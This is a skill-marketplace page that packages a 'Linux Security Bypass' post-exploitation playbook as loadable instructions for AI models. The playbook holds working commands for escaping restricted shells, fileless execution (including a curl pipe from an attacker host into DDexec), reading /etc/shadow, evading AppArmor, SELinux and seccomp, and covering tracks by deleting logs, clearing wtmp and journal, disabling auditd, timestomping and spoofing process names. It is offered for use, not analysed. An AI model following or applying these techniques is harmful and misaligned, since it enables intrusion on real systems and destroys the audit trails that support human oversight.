Linux Security Bypass logo

Linux Security Bypass

OrganizationPopular
yaklang
linux-security-bypass

Linux security mechanism bypass playbook. Use when facing restricted bash/rbash, read-only or noexec filesystems, AppArmor, SELinux, seccomp filters, or audit logging that must be evaded during post-exploitation.

Overview

Publisheryaklang
Repositoryhack-skills
Skill namelinux-security-bypass
Stars
2.2K
Forks
292
Bundled files
Instructions only
LicenseMIT
Links
  • Markdown instructions

    A SKILL.md file the model loads on demand, so it only costs tokens when a request actually matches.

  • Works with any LLM

    AI skills are plain Markdown, not provider-specific code, so this works with GPT, Claude, Gemini, Grok, or a local model.

  • Self-contained

    Everything the model needs lives in the instructions — no extra files to sync.

  • Open source

    Published by yaklang on GitHub. Read the source before you install it.

Installation

Install the Linux Security Bypass AI skill in TypingMind to use it with any LLM, or drop it into another agent that reads SKILL.md.

1

Install in TypingMind

TypingMind installs a skill straight from its GitHub folder — it reads SKILL.md, bundles the resource files, and stores the result locally.

  1. Open the app and go to Plugins → Skills.
  2. Choose "Install from GitHub".
  3. Paste the skill folder URL below and confirm.
  4. Enable the skill in any chat where you want it available.
Plugins → Skills → Add skill → From GitHub URL, then paste the folder URL and press Continue.
2

Install in another agent

Any agent that reads the Agent Skills format can use this skill — copy the folder into that agent's skills directory.

Claude Code — .claude/skills
git clone --depth 1 https://github.com/yaklang/hack-skills.git /tmp/hack-skills
mkdir -p .claude/skills
cp -r /tmp/hack-skills/skills/linux-security-bypass .claude/skills/linux-security-bypass
Restart Claude Code after copying so it picks up the new skill.

Use it in TypingMind

Enable Linux Security Bypass in any TypingMind chat and the model takes it from there. Its name and description sit in the system prompt, and the moment a request matches, the model loads the full instructions itself — you never invoke it by hand, and it costs no tokens until it is actually used.

The model loads Linux Security Bypass on its own as soon as a request matches it.

Works with any AI model

AI skills are plain Markdown instructions rather than provider-specific code, so Linux Security Bypass is not tied to the model it was written for. Install it once in TypingMind and use it with GPT-5, Claude, Gemini, Grok, DeepSeek, Mistral, Llama, or a local model you run yourself — all on your own API keys.

  • Loaded only when it is needed

    The system prompt carries just the name and description. The instructions are fetched on the first matching request, so an idle skill costs nothing.

  • Switch models mid-chat

    Because the skill is instructions rather than code, changing model does not break it — the next model reads the same SKILL.md.

Skill instructions

This is the SKILL.md content the model loads. Read it before installing — a skill is instructions your model will follow.

SKILL: Linux Security Bypass — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert techniques for bypassing Linux security mechanisms. Covers restricted shell escape, noexec bypass, AppArmor/SELinux evasion, seccomp circumvention, and audit evasion. Base models miss DDexec, memfd_create fileless execution, and architecture-confusion seccomp bypass.

0. RELATED ROUTING

Before going deep, consider loading:


1. RESTRICTED BASH (rbash) BYPASS

1.1 SSH-Based Bypass

bash
# Force a different shell via SSH
ssh user@host -t "bash --noprofile --norc"
ssh user@host -t "/bin/sh"
ssh user@host -t "bash -l"

# If ForceCommand is set in sshd_config, these may not work
# Try SFTP/SCP instead — often not restricted:
sftp user@host
# SFTP shell can sometimes execute commands

1.2 Editor-Based Escape

bash
# vi/vim escape
vi
:set shell=/bin/bash
:shell
# Or: :!/bin/bash

# ed escape
ed
!/bin/bash

# nano (if available)
# Ctrl+R → Ctrl+X → command execution

1.3 Language Interpreter Escape

InterpreterCommand
Pythonpython3 -c 'import pty; pty.spawn("/bin/bash")'
Perlperl -e 'exec "/bin/bash";'
Rubyruby -e 'exec "/bin/bash"'
Lualua -e 'os.execute("/bin/bash")'
PHPphp -r 'system("/bin/bash");'
Node.jsnode -e 'require("child_process").spawn("/bin/bash",{stdio:[0,1,2]})'
AWKawk 'BEGIN {system("/bin/bash")}'

1.4 Environment Variable Tricks

bash
# Overwrite shell via BASH_CMDS
BASH_CMDS[x]=/bin/bash
x

# Use env to spawn unrestricted shell
env /bin/bash
env -i /bin/bash

# PATH manipulation (if export is allowed)
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
/bin/bash

# If only specific commands are allowed:
# Use allowed command to read files
git log --oneline --all -p    # git can read arbitrary files
git diff /dev/null /etc/shadow

1.5 Other Escapes

MethodCommand
expectexpect -c 'spawn /bin/bash; interact'
scriptscript -qc /bin/bash /dev/null
rlwraprlwrap /bin/bash
nmap (old)nmap --interactive!bash

2. READ-ONLY / NOEXEC FILESYSTEM EXECUTION

2.1 DDexec — Execute From stdin via /proc/self/mem

bash
# DDexec overwrites the running process memory with a new binary
# No file written to disk — completely fileless

# Usage: pipe any ELF binary through DDexec
curl -sL https://attacker.com/payload | bash ddexec.sh

# How it works:
# 1. Opens /proc/self/mem for writing
# 2. Seeks to the text segment of the current process
# 3. Overwrites it with the target ELF binary
# 4. Jumps to the new entry point

2.2 memfd_create — In-Memory File Descriptor

python
import ctypes, os
libc = ctypes.CDLL("libc.so.6")
fd = libc.syscall(319, b"", 0)     # SYS_MEMFD_CREATE (x86_64)
with open(f"/proc/self/fd/{fd}", "wb") as f:
    f.write(open("/path/to/binary", "rb").read())
os.execve(f"/proc/self/fd/{fd}", ["binary"], os.environ)   # Bypasses noexec
bash
# Perl variant: syscall(319, "", 0) → write to fd → exec /proc/$$/fd/$fd

2.3 ld.so Direct Execution

bash
# Use the dynamic linker to execute from a writable mount
# Even if the binary's partition is noexec, ld.so runs from its own mount
/lib64/ld-linux-x86-64.so.2 /path/on/noexec/mount/binary

# Or from /dev/shm (usually writable + exec):
cp binary /dev/shm/binary
/dev/shm/binary

2.4 Script Interpreters on noexec

bash
# Scripts still execute on noexec — only ELF execution is blocked
# The interpreter (python/perl/bash) runs from an exec-allowed mount
# and reads the script as data

python3 /noexec/mount/exploit.py      # Works
perl /noexec/mount/exploit.pl         # Works
bash /noexec/mount/exploit.sh         # Works
# But ./exploit (ELF binary) → "Permission denied"

2.5 Writable Mount Points

bash
# Common writable + exec-capable locations:
/dev/shm        # tmpfs — almost always writable + exec
/tmp            # Sometimes noexec on hardened systems
/var/tmp        # Often writable
/run            # tmpfs — check permissions

# Check mount options:
mount | grep -E "shm|tmp"
# Look for "noexec" flag — if absent, exec is allowed

3. APPARMOR BYPASS

3.1 Profile Enumeration

bash
# Check AppArmor status
aa-status 2>/dev/null
cat /sys/module/apparmor/parameters/enabled     # Y = enabled
cat /sys/kernel/security/apparmor/profiles      # List all profiles

# Check current process profile:
cat /proc/self/attr/current
# "unconfined" = no restriction
# "docker-default (enforce)" = Docker's default profile

3.2 Exploitation Strategies

bash
# Find unconfined processes (inject via ptrace if root):
ps auxZ 2>/dev/null | grep unconfined

# Complain mode = effectively no restriction (just logging):
aa-status | grep complain

Common AppArmor profile gaps: /proc/self/fd/* access, abstract Unix sockets, interpreter-based execution (python scripts bypass binary restrictions), and newly created paths.


4. SELINUX BYPASS

4.1 Mode Check

bash
getenforce           # Enforcing / Permissive / Disabled
sestatus             # Detailed status
cat /etc/selinux/config   # Persistent configuration

# Check current context
id -Z
ps auxZ | head -20

4.2 Permissive Domain Exploitation

bash
semanage permissive -l 2>/dev/null    # Domains in permissive mode
ps -eZ | grep -i permissive           # Processes — can do anything (just logged)

4.3 Context Transition & Booleans

bash
ls -Z /tmp/                           # File contexts — tmp_t has broader access
sesearch --allow -t unconfined_t 2>/dev/null | head -30   # Transition rules

# Dangerous booleans that weaken SELinux:
getsebool -a | grep -i "on$" | grep -iE "exec|write|network|connect"
# httpd_can_network_connect, allow_execmem

5. SECCOMP BYPASS

5.1 Check Seccomp Status

bash
grep Seccomp /proc/self/status
# Seccomp: 0 = disabled, 1 = strict, 2 = filter

# Docker default seccomp profile blocks ~44 syscalls
# Check what's allowed:
./amicontained    # Shows blocked/allowed syscalls

5.2 Architecture Confusion (x86 vs x86_64)

bash
# Seccomp filters often only check x86_64 syscall numbers
# x86 (32-bit) syscall numbers are different!
# If the filter doesn't check the architecture:

# Compile a 32-bit binary that uses x86 syscall numbers:
# x86_64 execve = 59, x86 execve = 11
# The filter blocks syscall 59 but not 11

gcc -m32 -static -o exploit32 exploit.c
# If the seccomp filter lacks AUDIT_ARCH_X86 check → bypass

5.3 Allowed Syscall Abuse & Kernel Bugs

Allowed syscalls to abuse creatively: sendmsg/recvmsg (pass FDs between processes), mmap/mprotect (executable memory), process_vm_readv/writev (cross-process memory).

Known seccomp kernel bugs: CVE-2019-2054 (ptrace bypass), io_uring bypassed seccomp entirely (pre-5.12). Check uname -r and compare.


6. AUDIT EVASION

6.1 Timestamp Manipulation

bash
# Modify file timestamps to hide changes
touch -r /etc/hosts /modified/file          # Copy timestamp from reference
touch -t 202301010000.00 /modified/file     # Set specific timestamp

# Modify log timestamps (if writable)
# Use timestomping to match surrounding entries

6.2 Log Tampering & Process Spoofing

bash
sed -i '/pattern/d' /var/log/auth.log     # Remove specific entries
echo "" > /var/log/wtmp                    # Clear login records
journalctl --rotate && journalctl --vacuum-time=1s   # Clear journal

# Process name spoofing (hide in ps output):
exec -a "[kworker/0:0]" /bin/bash          # Bash
# C/Python: prctl(PR_SET_NAME, "kworker/0:0", 0, 0, 0)

# Disable audit (if root):
auditctl -e 0 && service auditd stop

7. LINUX SECURITY BYPASS DECISION TREE

Security mechanism identified?
├── Restricted shell (rbash)?
│   ├── SSH access? → ssh -t "bash --noprofile --norc" (§1.1)
│   ├── Editor available? → vi :!/bin/bash (§1.2)
│   ├── Language interpreter? → python/perl/ruby escape (§1.3)
│   ├── env command? → env /bin/bash (§1.4)
│   └── Allowed commands with escape? → git/man/less → !bash (§1.5)
├── noexec filesystem?
│   ├── Script interpreters available? → bash/python/perl scripts work (§2.4)
│   ├── /dev/shm writable + exec? → copy binary there (§2.5)
│   ├── memfd_create available? → fileless execution (§2.2)
│   ├── ld.so accessible? → ld.so /path/to/binary (§2.3)
│   └── Last resort → DDexec via /proc/self/mem (§2.1)
├── AppArmor enforcing?
│   ├── Profile in complain mode? → no restriction, just logging (§3.3)
│   ├── Unconfined processes exist? → inject/migrate to them (§3.2)
│   ├── Profile missing path coverage? → use uncovered paths (§3.4)
│   └── Interpreter not restricted? → script-based execution
├── SELinux enforcing?
│   ├── Domain set to permissive? → exploit that domain (§4.2)
│   ├── Dangerous booleans enabled? → abuse allowed actions (§4.4)
│   ├── Context transition available? → execute binary with transition (§4.3)
│   └── Kernel CVE? → SELinux bypass exploit
├── seccomp filter active?
│   ├── Architecture check missing? → 32-bit syscall confusion (§5.2)
│   ├── Allowed syscalls exploitable? → sendmsg/mmap abuse (§5.3)
│   ├── Kernel bug? → io_uring/ptrace bypass (§5.4)
│   └── Check what's blocked → amicontained (§5.1)
└── Audit logging?
    ├── Writable logs? → delete/modify entries (§6.2)
    ├── Root access? → disable auditd (§6.4)
    ├── Need stealth? → process name spoofing (§6.3)
    └── File changes tracked? → timestamp manipulation (§6.1)

Frequently asked questions

What does the Linux Security Bypass AI skill do?

Linux security mechanism bypass playbook. Use when facing restricted bash/rbash, read-only or noexec filesystems, AppArmor, SELinux, seccomp filters, or audit logging that must be evaded during post-exploitation.

Why use Linux Security Bypass on TypingMind?

Because you install it once and use it with any model. Linux Security Bypass is plain Markdown rather than provider-specific code, so the same skill runs on GPT-5, Claude, Gemini, Grok, or a local model — and you can switch model mid-chat without it breaking. TypingMind runs on your own API keys, so you pay providers directly instead of a per-seat subscription, and your skills and chats stay in your own storage.

How do I install Linux Security Bypass in TypingMind?

Open Plugins → Skills → Install from GitHub in TypingMind and paste https://github.com/yaklang/hack-skills/tree/main/skills/linux-security-bypass. TypingMind reads its SKILL.md and installs it as a skill you can enable per chat.

Which AI models can use Linux Security Bypass?

Any model you connect in TypingMind. AI skills are plain Markdown instructions rather than provider-specific code, so GPT, Claude, Gemini, Grok, and local models can all load this skill when a request matches it.

How many AI models can I use with Linux Security Bypass?

As many as you like. As long as a model supports skills, you can use Linux Security Bypass with it — GPT, Claude, Gemini, Grok, DeepSeek, Mistral, Llama and more — all on TypingMind with your own API keys.

Is the Linux Security Bypass AI skill free?

Yes. It is published on GitHub by yaklang under the MIT license. You only pay your own AI provider for the tokens you use.

What are AI skills?

An AI skill is a reusable instruction bundle that teaches an AI model how to do one specific task. It follows the open Agent Skills format: a SKILL.md file with a name and description, plus any scripts, templates or reference files the model may need. The model reads the instructions only when your request matches the skill, so an installed skill costs nothing until it is used.

How are AI skills different from plugins or MCP servers?

A plugin or MCP server gives a model new tools to call — code that runs somewhere and returns a result. An AI skill gives the model knowledge and process instead: how to approach a task, which steps to follow, what good output looks like. Skills are plain Markdown, so they need no server, no API key and no runtime, and they work with any model.

View all

Set up your own AI workspace now

Get notified about new features and future giveaways by subscribing to our newsletter 👇